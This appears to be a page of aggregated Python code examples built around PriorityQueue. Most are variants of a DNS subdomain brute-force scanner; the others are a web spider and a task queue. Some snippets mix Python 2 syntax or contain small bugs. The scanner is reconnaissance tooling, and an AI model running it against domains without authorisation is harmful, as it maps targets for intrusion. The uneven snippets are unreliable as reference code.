                                tmp_set.add(
                                    item.replace('{alphnum}', _letter, 1))
                        elif item.find('{alpha}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz':
                                tmp_set.add(item.replace(
                                    '{alpha}', _letter, 1))
                        elif item.find('{num}') >= 0:
                            for _letter in '0123456789':
                                tmp_set.add(item.replace('{num}', _letter, 1))
                        elif item not in _set:
                            _set.add(item)
                            self.next_subs.append(item)

    def _print_msg(self, _msg=None, _found_msg=False):
        if _msg is None:
            self.print_count += 1
            if self.print_count < 100:
                return
            self.print_count = 0
            msg = '%s Found| %s Groups| %s scanned in %.1f seconds' % (
                self.found_count, self.queue.qsize(), self.scan_count,
                time.time() - self.start_time)
            sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) +
                             msg)
        elif _msg.startswith('[+] Check DNS Server'):
            sys.stdout.write('\r' + _msg + ' ' *
                             (self.console_width - len(_msg)))
        else:
            sys.stdout.write('\r' + _msg + ' ' *
                             (self.console_width - len(_msg)) + '\n')
            if _found_msg:
                msg = '%s Found| %s Groups| %s scanned in %.1f seconds' % (
                    self.found_count, self.queue.qsize(), self.scan_count,
                    time.time() - self.start_time)
                sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) +
                                 msg)
        sys.stdout.flush()

    @staticmethod
    def is_intranet(ip):
        ret = ip.split('.')
        if len(ret) != 4:
            return True
        if ret[0] == '10':
            return True
        # 172.16.0.0/12 covers 172.16.0.0 - 172.31.255.255
        if ret[0] == '172' and 16 <= int(ret[1]) <= 31:
            return True
        if ret[0] == '192' and ret[1] == '168':
            return True
        return False

    def put_item(self, item):
        num = item.count('{alphnum}') + item.count('{alpha}') + item.count(
            '{num}')
        if num == 0:
            self.priority += 1
            self.queue.put((self.priority, item))
        else:
            self.queue.put((self.priority + num * 10000000, item))

    def _scan(self, j):
        self.resolvers[j].nameservers = [self.dns_servers[j % self.dns_count]]
        while not self.queue.empty():
            try:
                item = self.queue.get(timeout=1.0)[1]
                self.scan_count += 1
            except:
                break
            self._print_msg()
            try:
                if item.find('{alphnum}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                        self.put_item(item.replace('{alphnum}', _letter, 1))
                    continue
                elif item.find('{alpha}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz':
                        self.put_item(item.replace('{alpha}', _letter, 1))
                    continue
                elif item.find('{num}') >= 0:
                    for _letter in '0123456789':
                        self.put_item(item.replace('{num}', _letter, 1))
                    continue
                elif item.find('{next_sub}') >= 0:
                    for _ in self.next_subs:
                        self.queue.put((0, item.replace('{next_sub}', _, 1)))
                    continue
                else:
                    sub = item

                if sub in self.found_subs:
                    continue

                cur_sub_domain = sub + '.' + self.target
                _sub = sub.split('.')[-1]
                try:
                    answers = self.resolvers[j].query(cur_sub_domain)
                except dns.resolver.NoAnswer, e:
                    answers = self.ex_resolver.query(cur_sub_domain)

                if answers:
                    self.found_subs.add(sub)
                    ips = ', '.join(
                        sorted([answer.address for answer in answers]))
                    if ips in ['1.1.1.1', '127.0.0.1', '0.0.0.0']:
                        continue

                    if self.ignore_intranet and SubNameBrute.is_intranet(
                            answers[0].address):
                        continue

                    try:
                        self.scan_count += 1
                        answers = self.resolvers[j].query(
                            cur_sub_domain, 'cname')
                        cname = answers[0].target.to_unicode().rstrip('.')
                        if cname.endswith(
                                self.target) and cname not in self.found_subs:
                            self.found_subs.add(cname)
                            cname_sub = cname[:len(cname) - len(self.target) -
                                              1]  # new sub
                            self.queue.put((0, cname_sub))

                    except:
                        pass

                    if (_sub, ips) not in self.ip_dict:
                        self.ip_dict[(_sub, ips)] = 1
                    else:
                        self.ip_dict[(_sub, ips)] += 1

                    if ips not in self.ip_dict:
                        self.ip_dict[ips] = 1
                    else:
                        self.ip_dict[ips] += 1

                    if self.ip_dict[(_sub, ips)] > 3 or self.ip_dict[ips] > 6:
                        continue

                    self.found_count += 1
                    msg = cur_sub_domain.ljust(30) + ips
                    self._print_msg(msg, _found_msg=True)
                    self._print_msg()

                    # TODO: close write file
                    self.outfile.write(
                        cur_sub_domain.ljust(30) + '\t' + ips + '\n')
                    self.outfile.flush()

                    self.result_lines.append(
                        cur_sub_domain.ljust(30) + '\t' + ips)
                    self.result_domains.append(cur_sub_domain)
                    self.result_ips.extend(ips.split(", "))

                    try:
                        self.resolvers[j].query('lijiejietest.' +
                                                cur_sub_domain)
                    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer) as e:
                        self.queue.put((999999999, '{next_sub}.' + sub))
                    except:
                        pass

            except (dns.resolver.NXDOMAIN, dns.name.EmptyLabel) as e:
                pass
            except (dns.resolver.NoNameservers, dns.resolver.NoAnswer,
                    dns.exception.Timeout) as e:
                pass
Example #31
class JobSpider:
    def __init__(self, start_requests):
        self.start_request = start_requests
        self.domain = tldextract.extract(self.start_request.url).domain

        self.request_queue = PriorityQueue()
        self.result = {
            start_requests.url: 0,
        }
        self.gl_list = []
        self.stop_flag = False

    def start(self, number):
        resp = requests.get(self.start_request.url)
        if resp.status_code != 200:
            raise Exception('HTTPError<%d>' % resp.status_code)

        self.request_queue.put((0, self.start_request))
        for i in range(number):
            gl = gevent.spawn(self.downloader)
            self.gl_list.append(gl)
            gl.start()

    def stop(self):
        self.stop_flag = True

    def join(self):
        return gevent.joinall(self.gl_list)

    def downloader(self):
        a_re = re.compile(
            r'''<a.+?href=(['"])([^>\s]+)\1.*?>([\S\s]+?)<\/a>''',
            re.IGNORECASE)

        while not self.request_queue.empty():
            if self.stop_flag: break
            prio, request = self.request_queue.get()
            headers = {'User-Agent': choice(random_ua)}
            try:
                resp = requests.get(request.url, headers=headers)
            except Exception as e:
                continue

            encoding = chardet.detect(resp.content)['encoding']
            html_text = resp.content.decode(
                encoding) if encoding is not None else resp.text
            self.result[request.url] += calc_text_weight(html_text)
            if self.result[request.url] >= 100:
                self.stop()
                break

            if request.depth == max_depth:
                continue

            matches = a_re.findall(html_text)
            for each_a in matches:
                href = each_a[1]
                name = each_a[2]
                if href.startswith('javascript'): continue
                if href.startswith('/'): href = request.url + href
                if href.startswith('http'):
                    new_request = Request(href, request.depth + 1)
                    self.result[href] = calc_name_url_weight(name, href)
                    if tldextract.extract(href).domain == self.domain:
                        self.request_queue.put(
                            (-self.result[href], new_request))
                    elif self.result[href] >= 80:
                        self.request_queue.put(
                            (-self.result[href], new_request))
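
A minimal driver for the spider above; Request, random_ua, max_depth and the calc_*_weight helpers are defined elsewhere in this example's module, so only the call order is shown.

# Hypothetical driver -- assumes Request and the weight helpers are
# importable from this example's module.
start = Request('http://www.example.com', 0)
spider = JobSpider(start)
spider.start(10)   # spawn 10 downloader greenlets
spider.join()      # block until all greenlets finish
for url, weight in sorted(spider.result.items(), key=lambda kv: -kv[1]):
    print('%s %s' % (url, weight))
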
class SubNameBrute:
    """
        receive commandline args and do some initialization work
    """
    def __init__(self, target, options):
        self.start_time = time.time()
        self.target = target.strip()
        self.options = options
        self.scan_count = self.found_count = 0
        self.console_width = os.get_terminal_size()[0] - 2

        # create dns resolver pool ~ workers
        self.resolvers = [
            dns.resolver.Resolver(configure=False)
            for _ in range(options.threads)
        ]
        for resolver in self.resolvers:
            resolver.lifetime = resolver.timeout = 10.0

        self.print_count = 0
        self.STOP_ME = False

        # load dns servers and check whether they work fine
        self._load_dns_servers()

        # load sub names
        self.subs = []  # subs in file
        self.goodsubs = []  # checks ok for further exploitation
        self._load_subname('dict/subnames.txt', self.subs)

        # load sub.sub names
        self.subsubs = []
        self._load_subname('dict/next_sub.txt', self.subsubs)

        # results will save to target.txt

        global path

        path = os.path.join("results", target)
        if not os.path.exists(path):
            os.makedirs(path)

        self.outfile = open('%s/%s.txt' % (path, target), 'w')

        self.ip_dict = set()
        self.found_sub = set()

        # task queue
        self.queue = PriorityQueue()
        for sub in self.subs:
            self.queue.put(sub)

    """
        Load DNS servers (IPs saved in a file) and check whether they work fine
    """

    def _load_dns_servers(self):
        print('[*] Validate DNS servers ...')
        self.dns_servers = []

        # create a process pool for checking DNS servers; pool size is
        # cpu cores * 2, adjust as needed
        processors = cpu_count() * 2
        pool = Pool(processors)

        # read dns ips and check one by one
        for server in open('dict/dns_servers.txt').readlines():
            server = server.strip()
            if server:
                pool.apply_async(self._test_server, (server, ))

        pool.join()  # wait for all checks to finish
        self.dns_count = len(self.dns_servers)

        sys.stdout.write('\n')
        dns_info = '[+] Found {} available DNS Servers in total'.format(
            self.dns_count)
        print(dns_info)

        if self.dns_count == 0:
            print('[ERROR] No DNS Servers available.')
            sys.exit(-1)

    """
        test these dns servers whether works fine
    """

    def _test_server(self, server):

        # create a dns resolver and set timeout
        resolver = dns.resolver.Resolver()
        resolver.lifetime = resolver.timeout = 10.0

        try:
            resolver.nameservers = [server]

            answers = resolver.query('public-dns-a.baidu.com')
            if answers[0].address != '180.76.76.76':
                raise Exception('incorrect DNS response')
            self.dns_servers.append(server)
        except Exception:
            self._print_msg('[-] Check DNS Server %s <Fail>   Found %s' %
                            (server.ljust(16), len(self.dns_servers)))
            return

        self._print_msg('[+] Check DNS Server %s < OK >   Found %s' %
                        (server.ljust(16), len(self.dns_servers)))

    """
        load sub names in dict/*.txt, one function would be enough
        file for read, subname_list for saving sub names
    """

    def _load_subname(self, file, subname_list):
        self._print_msg('[*] Load sub names ...')

        with open(file) as f:
            for line in f:
                sub = line.strip()
                if sub and sub not in subname_list:
                    tmp_set = {sub}
                    """
                        in case of the sub names which contains the following expression
                        and replace them {alphnum}, {alpha}, {num} with character and num
                    """
                    while len(tmp_set) > 0:
                        item = tmp_set.pop()
                        if item.find('{alphnum}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                                tmp_set.add(
                                    item.replace('{alphnum}', _letter, 1))
                        elif item.find('{alpha}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz':
                                tmp_set.add(item.replace(
                                    '{alpha}', _letter, 1))
                        elif item.find('{num}') >= 0:
                            for _letter in '0123456789':
                                tmp_set.add(item.replace('{num}', _letter, 1))
                        elif item not in subname_list:
                            subname_list.append(item)

    """
        for better presentation of brute force results, not really matters ...
    """

    def _print_msg(self, _msg=None, _found_msg=False):
        if _msg is None:
            self.print_count += 1
            if self.print_count < 100:
                return
            self.print_count = 0
            msg = '%s Found| %s Groups| %s scanned in %.1f seconds' % (
                self.found_count, self.queue.qsize(), self.scan_count,
                time.time() - self.start_time)
            sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) +
                             msg)
        elif _msg.startswith('[+] Check DNS Server'):
            sys.stdout.write('\r' + _msg + ' ' *
                             (self.console_width - len(_msg)))
        else:
            sys.stdout.write('\r' + _msg + ' ' *
                             (self.console_width - len(_msg)) + '\n')
            if _found_msg:
                msg = '%s Found| %s Groups| %s scanned in %.1f seconds' % (
                    self.found_count, self.queue.qsize(), self.scan_count,
                    time.time() - self.start_time)
                sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) +
                                 msg)
        sys.stdout.flush()

    def _print_domain(self, msg):
        console_width = os.get_terminal_size()[0]
        msg = '\r' + msg + ' ' * (console_width - len(msg))
        # msg = '\033[0;31;47m%s{}\033[0m'.format(msg)
        sys.stdout.write(msg)

    def _print_progress(self):
        """
            显示扫描进度,显示更美观
        """
        msg = '\033[0;31;47m%s\033[0m found | %s remaining | %s scanned in %.2f seconds' % \
              (self.found_count, self.queue.qsize(), self.scan_count, time.time()- self.start_time)

        console_width = os.get_terminal_size()[0]
        out = '\r' + ' ' * int((console_width - len(msg)) / 2) + msg
        sys.stdout.write(out)

    """
        important : assign task to resolvers
    """

    def _scan(self, j):
        self.resolvers[j].nameservers = [self.dns_servers[j % self.dns_count]]
        while not self.queue.empty():
            try:
                # gevent's queue raises Empty on timeout; catch it so the
                # worker exits cleanly instead of dying with a traceback
                sub = self.queue.get(timeout=1.0)
            except Exception:
                break
            self.scan_count += 1

            try:
                cur_sub_domain = sub + '.' + self.target
                answers = self.resolvers[j].query(cur_sub_domain)
            except Exception:
                continue

            if answers:
                ips = ', '.join(sorted([answer.address for answer in answers]))

                # exclude intranet and reserved addresses
                if ips in ['1.1.1.1', '127.0.0.1', '0.0.0.0', '0.0.0.1']:
                    continue
                if SubNameBrute.is_intranet(answers[0].address):
                    continue

                self.found_sub.add(cur_sub_domain)
                for answer in answers:
                    self.ip_dict.add(answer.address)

                if sub not in self.goodsubs:
                    self.goodsubs.append(sub)

                self.found_count += 1
                ip_info = '{} \t {}'.format(cur_sub_domain, ips)
                # print(ip_info)
                self.outfile.write(cur_sub_domain + '\t' + ips + '\n')
                self._print_domain(ip_info)
                sys.stdout.flush()
                self._print_progress()
                sys.stdout.flush()

    @staticmethod
    def is_intranet(ip):
        ret = ip.split('.')
        if len(ret) != 4:
            return True
        if ret[0] == '10':
            return True
        if ret[0] == '172' and 16 <= int(ret[1]) <= 31:  # RFC1918: 172.16.0.0/12
            return True
        if ret[0] == '192' and ret[1] == '168':
            return True
        return False

    """
        assign task to threads ...
    """

    def run(self):
        threads = [
            gevent.spawn(self._scan, i) for i in range(self.options.threads)
        ]

        print('[*] Initializing %d threads' % self.options.threads)

        try:
            gevent.joinall(threads)
        except KeyboardInterrupt:
            msg = '[WARNING] User aborted.'
            sys.stdout.write('\r' + msg + ' ' *
                             (self.console_width - len(msg)) + '\n\r')
            sys.stdout.flush()
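
_load_subname above expands the {alphnum}, {alpha} and {num} placeholders one occurrence at a time through a working set, so a pattern like 'mx{num}' becomes mx0..mx9 before it is queued. A minimal standalone sketch of the same expansion loop (same placeholder tokens as the dict files, nothing else assumed):

CHARSETS = {
    '{alphnum}': 'abcdefghijklmnopqrstuvwxyz0123456789',
    '{alpha}': 'abcdefghijklmnopqrstuvwxyz',
    '{num}': '0123456789',
}

def expand(pattern):
    result, pending = [], {pattern}
    while pending:
        item = pending.pop()
        for token, charset in CHARSETS.items():
            if token in item:
                # replace only the first occurrence; the rest are handled
                # when the partially-expanded items are popped again
                pending.update(item.replace(token, c, 1) for c in charset)
                break
        else:
            result.append(item)  # no placeholders left, fully expanded
    return result

print(len(expand('mx{num}')))  # 10
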
Example #33
0
class TaskList:
    """
    Task list is a FIFO queue of tasks
    """
    def __init__(self, service):
        self.service = service
        self._queue = PriorityQueue()
        # done keeps the tasks that have been extracted from the queue
        # so we can inspect them later

        # keep the done tasks on disk, not in memory.
        # we currently use the filesystem, but any key-value store or database
        # could be plugged in behind; check TaskStorageBase to see the
        # interface your storage needs to implement in order to store tasks
        # self._done = TaskStorageFile(self)
        self._done = TaskStorageSqlite(self)
        # pointer to current task
        self._current = None
        self._current_mu = Semaphore()

    @property
    def current(self):
        with self._current_mu:
            return self._current

    @current.setter
    def current(self, value):
        with self._current_mu:
            self._current = value

    def __del__(self):
        if self._done:
            self._done.close()

    def get(self):
        """
        pop out a task from the task list
        this call is blocking when the task list is empty
        """
        _, task = self._queue.get()
        self.current = task
        nr_task_waiting.labels(service_guid=self.service.guid).dec()
        return task

    def put(self, task, priority=PRIORITY_NORMAL):
        """
        append task to the task list
        """
        if not isinstance(task, Task):
            raise ValueError(
                "task should be an instance of the Task class not %s" %
                type(task))
        task._priority = priority
        nr_task_waiting.labels(service_guid=self.service.guid).inc()
        self._queue.put((priority, task))

    def done(self, task):
        """
        notify that a task is done
        """
        if task._priority != PRIORITY_SYSTEM:
            self.current = None
            self._done.add(task)

    def empty(self):
        """
        return True if the task list is empty, False otherwise
        """
        return self._queue.empty()

    def clear(self):
        """
        clear the task list of all its tasks
        """

        try:
            while not self.empty():
                self._queue.get_nowait()
        except gevent.queue.Empty:
            return

    def list_tasks(self, all=False):
        """
        @param all: if True, also return the tasks that have been executed;
                    if False, only return the tasks waiting in the task list
        returns all the tasks that are currently in the task list
        """
        tasks = [x[1] for x in self._queue.queue]
        if all:
            tasks.extend(self._done.list())

        if self.current and self.current.state == TASK_STATE_RUNNING:
            # also return the current running
            # task as part of the task list
            tasks.insert(0, self.current)

        return tasks

    def get_task_by_guid(self, guid):
        """
        return a task from the list by its guid
        """

        # FIXME: this is really inefficient
        def find_task(guid, l):
            for task in l:
                if task.guid == guid:
                    return task
            raise TaskNotFoundError()

        # check if it's not the current running task
        if self.current and self.current.guid == guid:
            return self.current

        # search in waiting tasks
        try:
            task = find_task(guid, [x[1] for x in self._queue.queue])
            return task
        except TaskNotFoundError:
            pass

        # search in done task
        # this will raise TaskNotFoundError if can't find the task
        return self._done.get(guid)

    def save(self, path):
        """
        serialize the task list to disk
        @param path: file path where to serialize the task list
        """
        def serialize_task(task):
            return {
                "guid": task.guid,
                "action_name": task.action_name,
                "args": task._args,
                "state": task.state,
                "eco": json.loads(task.eco.json) if task.eco else None,
                "created": task.created,
            }

        output = []
        for task in self.list_tasks(all=False):
            output.append(serialize_task(task))
        j.data.serializer.yaml.dump(path, output)

    def load(self, path):
        """
        load a task list that has been serialized with the save method
        @param path: file path where the task list is serialized
        """
        if not os.path.exists(path):
            return

        data = j.data.serializer.yaml.load(path)
        for task in data:
            if task['state'] in [TASK_STATE_NEW, TASK_STATE_RUNNING]:
                self.put(_instantiate_task(task, self.service))
            else:
                # unsupported state, just skip it
                continue
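
TaskList.put enqueues bare (priority, task) tuples, so when two tasks share a priority the heap must compare the Task objects themselves, which raises TypeError for classes without ordering methods. A common fix, shown here as a hypothetical wrapper rather than the original code, is a monotonic counter as a tie-breaker, which also preserves FIFO order within one priority level:

import itertools
from queue import PriorityQueue

class SafeTaskQueue:
    def __init__(self):
        self._queue = PriorityQueue()
        self._counter = itertools.count()  # strictly increasing tie-breaker

    def put(self, task, priority=10):
        # the counter decides ties, so task objects are never compared
        self._queue.put((priority, next(self._counter), task))

    def get(self):
        _priority, _seq, task = self._queue.get()
        return task
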
Example #34
0
class SubNameBrute:
    def __init__(self, target, options, process_num, dns_servers, cdns, next_subs,
                 scan_count, found_count, queue_size_list, tmp_dir):
        self.target = target.strip()
        self.options = options
        self.process_num = process_num
        self.dns_servers = dns_servers
        self.cdns = cdns

        self.dns_count = len(dns_servers)
        self.next_subs = next_subs
        self.scan_count = scan_count
        self.scan_count_local = 0
        self.found_count = found_count
        self.found_count_local = 0
        self.queue_size_list = queue_size_list

        self.resolvers = [dns.resolver.Resolver(configure=False) for _ in range(options.threads)]
        for _r in self.resolvers:
            _r.lifetime = _r.timeout = 6.0
        self.queue = PriorityQueue()
        self.item_index = 0
        self.priority = 0
        self._load_sub_names()
        self.ip_dict = {}
        self.found_subs = set()
        self.ex_resolver = dns.resolver.Resolver(configure=False)
        self.ex_resolver.nameservers = dns_servers
        self.local_time = time.time()
        self.outfile = open('%s/%s_part_%s.txt' % (tmp_dir, target, process_num), 'w')

    def _load_sub_names(self):
        if self.options.full_scan and self.options.file == 'subnames.txt':
            _file = 'dict/subnames_full.txt'
        else:
            if os.path.exists(self.options.file):
                _file = self.options.file
            elif os.path.exists('dict/%s' % self.options.file):
                _file = 'dict/%s' % self.options.file
            else:
                print_msg('[ERROR] Names file not found: %s' % self.options.file)
                exit(-1)

        normal_lines = []
        wildcard_lines = []
        wildcard_list = []
        regex_list = []
        lines = set()
        with open(_file) as f:
            for line in f:
                sub = line.strip()
                if not sub or sub in lines:
                    continue
                lines.add(sub)

                if sub.find('{alphnum}') >= 0 or sub.find('{alpha}') >= 0 or sub.find('{num}') >= 0:
                    wildcard_lines.append(sub)
                    sub = sub.replace('{alphnum}', '[a-z0-9]')
                    sub = sub.replace('{alpha}', '[a-z]')
                    sub = sub.replace('{num}', '[0-9]')
                    if sub not in wildcard_list:
                        wildcard_list.append(sub)
                        regex_list.append('^' + sub + '$')
                else:
                    normal_lines.append(sub)
        if regex_list:
            pattern = '|'.join(regex_list)
            _regex = re.compile(pattern)
            for line in normal_lines[:]:
                if _regex.search(line):
                    normal_lines.remove(line)

        for item in normal_lines[self.process_num::self.options.process]:
            self.priority += 1
            self.queue.put((self.priority, item))

        for item in wildcard_lines[self.process_num::self.options.process]:
            self.queue.put((88888888, item))

    def put_item(self, item):
        num = item.count('{alphnum}') + item.count('{alpha}') + item.count('{num}')
        if num == 0:
            self.priority += 1
            self.queue.put((self.priority, item))
        else:
            self.queue.put((self.priority + num * 10000000, item))

    def check_cdn(self, cname):
        # return True if the cname matches any known CDN domain
        for cdn in self.cdns:
            if cdn in cname:
                return True
        return False

    def _scan(self, j):
        self.resolvers[j].nameservers = [self.dns_servers[j % self.dns_count]]
        while not self.queue.empty():
            try:
                item = self.queue.get(timeout=3.0)[1]
                self.scan_count_local += 1
                if time.time() - self.local_time > 3.0:
                    self.scan_count.value += self.scan_count_local
                    self.scan_count_local = 0
                    self.queue_size_list[self.process_num] = self.queue.qsize()
            except Exception:
                break
            try:
                if item.find('{alphnum}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                        self.put_item(item.replace('{alphnum}', _letter, 1))
                    continue
                elif item.find('{alpha}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz':
                        self.put_item(item.replace('{alpha}', _letter, 1))
                    continue
                elif item.find('{num}') >= 0:
                    for _letter in '0123456789':
                        self.put_item(item.replace('{num}', _letter, 1))
                    continue
                elif item.find('{next_sub}') >= 0:
                    for _ in self.next_subs:
                        self.queue.put((0, item.replace('{next_sub}', _, 1)))
                    continue
                else:
                    sub = item

                if sub in self.found_subs:
                    continue

                cur_sub_domain = sub + '.' + self.target
                _sub = sub.split('.')[-1]
                try:
                    answers = self.resolvers[j].query(cur_sub_domain)
                except dns.resolver.NoAnswer:
                    answers = self.ex_resolver.query(cur_sub_domain)

                if answers:
                    try:
                        ans = self.resolvers[j].query(cur_sub_domain, 'cname')
                        cname = ans[0].target.to_unicode().rstrip('.')
                        if self.check_cdn(cname):
                            continue
                    except dns.resolver.NoAnswer:
                        pass  # no CNAME record, so it cannot be behind a CDN
                    self.found_subs.add(sub)
                    ips = ', '.join(sorted([answer.address for answer in answers]))
                    if ips in ['1.1.1.1', '127.0.0.1', '0.0.0.0']:
                        continue

                    if self.options.i and is_intranet(answers[0].address):
                        continue

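                    # chase CNAME records: if the alias points back into the
                    # target domain, enqueue it as a new sub at priority 0 so
                    # it is scanned ahead of everything else in the heap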
                    try:
                        self.scan_count_local += 1
                        answers = self.resolvers[j].query(cur_sub_domain, 'cname')
                        cname = answers[0].target.to_unicode().rstrip('.')
                        if cname.endswith(self.target) and cname not in self.found_subs:
                            self.found_subs.add(cname)
                            cname_sub = cname[:len(cname) - len(self.target) - 1]    # new sub
                            self.queue.put((0, cname_sub))

                    except:
                        pass

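                    # count repeated (sub, ip-set) pairs; after 30 hits the
                    # result is almost certainly a wildcard / pan-DNS record,
                    # so stop recording further matches for it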
                    if (_sub, ips) not in self.ip_dict:
                        self.ip_dict[(_sub, ips)] = 1
                    else:
                        self.ip_dict[(_sub, ips)] += 1
                        if self.ip_dict[(_sub, ips)] > 30:
                            continue

                    self.found_count_local += 1
                    if time.time() - self.local_time > 3.0:
                        self.found_count.value += self.found_count_local
                        self.found_count_local = 0
                        self.queue_size_list[self.process_num] = self.queue.qsize()
                        self.local_time = time.time()

                    msg = cur_sub_domain.ljust(30) + ips
                    # print_msg(msg, line_feed=True)

                    self.outfile.write(cur_sub_domain.ljust(30) + '\t' + ips + '\n')
                    self.outfile.flush()
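                    # probe a label that should not exist: NXDOMAIN/NoAnswer
                    # means no wildcard record here, so expanding
                    # {next_sub}.<sub> for a deeper pass is worthwhile
                    # (999999999 sorts last, i.e. lowest priority)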
                    try:
                        self.resolvers[j].query('lijiejietest.' + cur_sub_domain)
                    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer) as e:
                        self.queue.put((999999999, '{next_sub}.' + sub))
                    except:
                        pass

            except (dns.resolver.NXDOMAIN, dns.name.EmptyLabel) as e:
                pass
            except (dns.resolver.NoNameservers, dns.resolver.NoAnswer, dns.exception.Timeout) as e:
                pass
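
put_item above gives concrete names an ever-increasing priority (FIFO among themselves) and pushes templates with unexpanded placeholders far down the heap (num * 10000000 per placeholder), so cheap lookups run before expensive wildcard expansions. A standalone sketch of that ordering, outside the class:

from queue import PriorityQueue

queue, priority = PriorityQueue(), 0

def put_item(item):
    global priority
    num = item.count('{alphnum}') + item.count('{alpha}') + item.count('{num}')
    if num == 0:
        priority += 1
        queue.put((priority, item))  # concrete name: keep FIFO order
    else:
        queue.put((priority + num * 10000000, item))  # defer templates

for name in ['www', 'mail{num}', 'api']:
    put_item(name)
while not queue.empty():
    print(queue.get())  # (1, 'www'), (2, 'api'), (10000001, 'mail{num}')
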
Example #35
0
class SubNameBrute:
    def __init__(self, target, options, process_num, dns_servers, next_subs,
                 scan_count, found_count, queue_size_list, tmp_dir):
        self.target = target.strip()
        self.options = options
        self.process_num = process_num
        self.dns_servers = dns_servers
        self.dns_count = len(dns_servers)
        self.next_subs = next_subs
        self.scan_count = scan_count
        self.scan_count_local = 0
        self.found_count = found_count
        self.found_count_local = 0
        self.queue_size_list = queue_size_list

        self.resolvers = [dns.resolver.Resolver(configure=False) for _ in range(options.threads)]
        for _r in self.resolvers:
            _r.lifetime = _r.timeout = 6.0
        self.queue = PriorityQueue()
        self.item_index = 0
        self.priority = 0
        self._load_sub_names()
        self.ip_dict = {}
        self.found_subs = set()
        self.ex_resolver = dns.resolver.Resolver(configure=False)
        self.ex_resolver.nameservers = dns_servers
        self.local_time = time.time()
        self.outfile = open('%s/%s_part_%s.txt' % (tmp_dir, target, process_num), 'w')

    def _load_sub_names(self):
        if self.options.full_scan and self.options.file == 'subnames.txt':
            _file = 'dict/subnames_full.txt'
        else:
            if os.path.exists(self.options.file):
                _file = self.options.file
            elif os.path.exists('dict/%s' % self.options.file):
                _file = 'dict/%s' % self.options.file
            else:
                print_msg('[ERROR] Names file not found: %s' % self.options.file)
                exit(-1)

        normal_lines = []
        wildcard_lines = []
        wildcard_list = []
        regex_list = []
        lines = set()
        with open(_file) as f:
            for line in f:
                sub = line.strip()
                if not sub or sub in lines:
                    continue
                lines.add(sub)

                if sub.find('{alphnum}') >= 0 or sub.find('{alpha}') >= 0 or sub.find('{num}') >= 0:
                    wildcard_lines.append(sub)
                    sub = sub.replace('{alphnum}', '[a-z0-9]')
                    sub = sub.replace('{alpha}', '[a-z]')
                    sub = sub.replace('{num}', '[0-9]')
                    if sub not in wildcard_list:
                        wildcard_list.append(sub)
                        regex_list.append('^' + sub + '$')
                else:
                    normal_lines.append(sub)
        if regex_list:
            pattern = '|'.join(regex_list)
            _regex = re.compile(pattern)
            for line in normal_lines[:]:
                if _regex.search(line):
                    normal_lines.remove(line)

        for item in normal_lines[self.process_num::self.options.process]:
            self.priority += 1
            self.queue.put((self.priority, item))

        for item in wildcard_lines[self.process_num::self.options.process]:
            self.queue.put((88888888, item))

    def put_item(self, item):
        num = item.count('{alphnum}') + item.count('{alpha}') + item.count('{num}')
        if num == 0:
            self.priority += 1
            self.queue.put((self.priority, item))
        else:
            self.queue.put((self.priority + num * 10000000, item))

    def _scan(self, j):
        self.resolvers[j].nameservers = [self.dns_servers[j % self.dns_count]]
        while not self.queue.empty():
            try:
                item = self.queue.get(timeout=3.0)[1]
                self.scan_count_local += 1
                if time.time() - self.local_time > 3.0:
                    self.scan_count.value += self.scan_count_local
                    self.scan_count_local = 0
                    self.queue_size_list[self.process_num] = self.queue.qsize()
            except Exception:
                break
            try:
                if item.find('{alphnum}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                        self.put_item(item.replace('{alphnum}', _letter, 1))
                    continue
                elif item.find('{alpha}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz':
                        self.put_item(item.replace('{alpha}', _letter, 1))
                    continue
                elif item.find('{num}') >= 0:
                    for _letter in '0123456789':
                        self.put_item(item.replace('{num}', _letter, 1))
                    continue
                elif item.find('{next_sub}') >= 0:
                    for _ in self.next_subs:
                        self.queue.put((0, item.replace('{next_sub}', _, 1)))
                    continue
                else:
                    sub = item

                if sub in self.found_subs:
                    continue

                cur_sub_domain = sub + '.' + self.target
                _sub = sub.split('.')[-1]
                try:
                    answers = self.resolvers[j].query(cur_sub_domain)
                except dns.resolver.NoAnswer:
                    answers = self.ex_resolver.query(cur_sub_domain)

                if answers:
                    self.found_subs.add(sub)
                    ips = ', '.join(sorted([answer.address for answer in answers]))
                    if ips in ['1.1.1.1', '127.0.0.1', '0.0.0.0']:
                        continue

                    if self.options.i and is_intranet(answers[0].address):
                        continue

                    try:
                        self.scan_count_local += 1
                        answers = self.resolvers[j].query(cur_sub_domain, 'cname')
                        cname = answers[0].target.to_unicode().rstrip('.')
                        if cname.endswith(self.target) and cname not in self.found_subs:
                            self.found_subs.add(cname)
                            cname_sub = cname[:len(cname) - len(self.target) - 1]    # new sub
                            self.queue.put((0, cname_sub))

                    except:
                        pass

                    if (_sub, ips) not in self.ip_dict:
                        self.ip_dict[(_sub, ips)] = 1
                    else:
                        self.ip_dict[(_sub, ips)] += 1
                        if self.ip_dict[(_sub, ips)] > 30:
                            continue

                    self.found_count_local += 1
                    if time.time() - self.local_time > 3.0:
                        self.found_count.value += self.found_count_local
                        self.found_count_local = 0
                        self.queue_size_list[self.process_num] = self.queue.qsize()
                        self.local_time = time.time()

                    msg = cur_sub_domain.ljust(30) + ips
                    # print_msg(msg, line_feed=True)

                    self.outfile.write(cur_sub_domain.ljust(30) + '\t' + ips + '\n')
                    self.outfile.flush()
                    try:
                        self.resolvers[j].query('lijiejietest.' + cur_sub_domain)
                    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer) as e:
                        self.queue.put((999999999, '{next_sub}.' + sub))
                    except:
                        pass

            except (dns.resolver.NXDOMAIN, dns.name.EmptyLabel) as e:
                pass
            except (dns.resolver.NoNameservers, dns.resolver.NoAnswer, dns.exception.Timeout) as e:
                pass
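
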